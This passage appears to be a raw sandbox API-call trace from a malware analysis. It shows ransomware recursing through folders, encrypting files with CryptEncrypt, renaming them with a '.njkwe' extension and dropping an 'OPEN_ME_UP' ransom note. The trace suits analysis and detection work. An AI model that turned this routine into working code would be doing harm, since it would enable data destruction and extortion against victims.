-1 [0061.280] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 48 [0061.280] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.280] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.280] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.280] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.280] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.280] GetTickCount () returned 0x114fbf5 [0061.280] GetTickCount () returned 0x114fbf5 [0061.280] GetTickCount () returned 0x114fbf5 [0061.280] GetTickCount () returned 0x114fbf5 [0061.280] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.280] GetProcessHeap () returned 0xbe0000 [0061.280] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.281] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.282] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.283] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.283] GetProcessHeap () returned 0xbe0000 [0061.283] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.283] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.283] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.283] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.283] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.283] CloseHandle (hObject=0x42c) returned 1 [0061.286] GetProcessHeap () returned 0xbe0000 [0061.286] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.286] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.286] GetProcessHeap () returned 0xbe0000 [0061.286] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.286] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.287] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.287] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.287] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.287] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.287] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.287] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 49 [0061.287] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.287] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.287] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.287] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.287] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.288] GetTickCount () returned 0x114fc05 [0061.288] GetTickCount () returned 0x114fc05 [0061.288] GetTickCount () returned 0x114fc05 [0061.288] GetTickCount () returned 0x114fc05 [0061.288] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.288] GetProcessHeap () returned 0xbe0000 [0061.288] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.288] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.290] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.290] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.290] GetProcessHeap () returned 0xbe0000 [0061.290] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.290] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.290] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.290] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.290] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.290] CloseHandle (hObject=0x42c) returned 1 [0061.291] GetProcessHeap () returned 0xbe0000 [0061.291] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.291] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.292] GetProcessHeap () returned 0xbe0000 [0061.292] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.292] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.292] FindClose (in: hFindFile=0xc19ca0 | out: hFindFile=0xc19ca0) returned 1 [0061.292] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.292] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1038\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.292] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.293] CloseHandle (hObject=0x428) returned 1 [0061.293] GetProcessHeap () returned 0xbe0000 [0061.294] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.294] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1040", cAlternateFileName="")) returned 1 [0061.294] lstrcmpiW (lpString1="1040", lpString2="Windows") returned -1 [0061.294] lstrcmpiW (lpString1="1040", lpString2="$Recycle.bin") returned 1 [0061.294] lstrcmpiW (lpString1="1040", lpString2="System Volume Information") returned -1 [0061.294] lstrcmpiW (lpString1="1040", lpString2="Program Files") returned -1 [0061.294] lstrcmpiW (lpString1="1040", lpString2="Program Files (x86)") returned -1 [0061.294] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040") returned 30 [0061.294] lstrcmpW (lpString1="1040", lpString2=".") returned 1 [0061.294] lstrcmpW (lpString1="1040", lpString2="..") returned 1 [0061.294] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.294] GetProcessHeap () returned 0xbe0000 [0061.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.294] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\*") returned 32 [0061.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e60 [0061.295] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.295] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.295] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.295] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.295] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.295] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\.") returned 32 [0061.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.295] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.295] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.295] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.295] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.295] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.295] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.295] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\..") returned 33 [0061.295] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.295] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.295] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.295] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.295] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.295] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.295] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.295] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.295] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 39 [0061.295] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.295] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.295] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.295] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.295] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.296] GetTickCount () returned 0x114fc05 [0061.296] GetTickCount () returned 0x114fc05 [0061.296] GetTickCount () returned 0x114fc05 [0061.296] GetTickCount () returned 0x114fc05 [0061.296] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.296] GetProcessHeap () returned 0xbe0000 [0061.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.296] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xe3b, lpOverlapped=0x0) returned 1 [0061.297] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff1c5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.298] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xe3b, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xe3b, lpOverlapped=0x0) returned 1 [0061.298] GetProcessHeap () returned 0xbe0000 [0061.298] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.298] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.298] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.298] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.298] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.298] CloseHandle (hObject=0x42c) returned 1 [0061.299] GetProcessHeap () returned 0xbe0000 [0061.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.299] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.302] GetProcessHeap () returned 0xbe0000 [0061.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.302] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.302] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.302] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.302] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.302] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.302] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.302] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 48 [0061.302] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.302] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.302] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.302] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.302] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.302] GetTickCount () returned 0x114fc14 [0061.302] GetTickCount () returned 0x114fc14 [0061.302] GetTickCount () returned 0x114fc14 [0061.303] GetTickCount () returned 0x114fc14 [0061.303] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.303] GetProcessHeap () returned 0xbe0000 [0061.303] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.303] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.305] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.305] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.305] GetProcessHeap () returned 0xbe0000 [0061.305] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.305] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.305] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.305] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.305] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.305] CloseHandle (hObject=0x42c) returned 1 [0061.307] GetProcessHeap () returned 0xbe0000 [0061.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.307] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.308] GetProcessHeap () returned 0xbe0000 [0061.308] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.308] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, 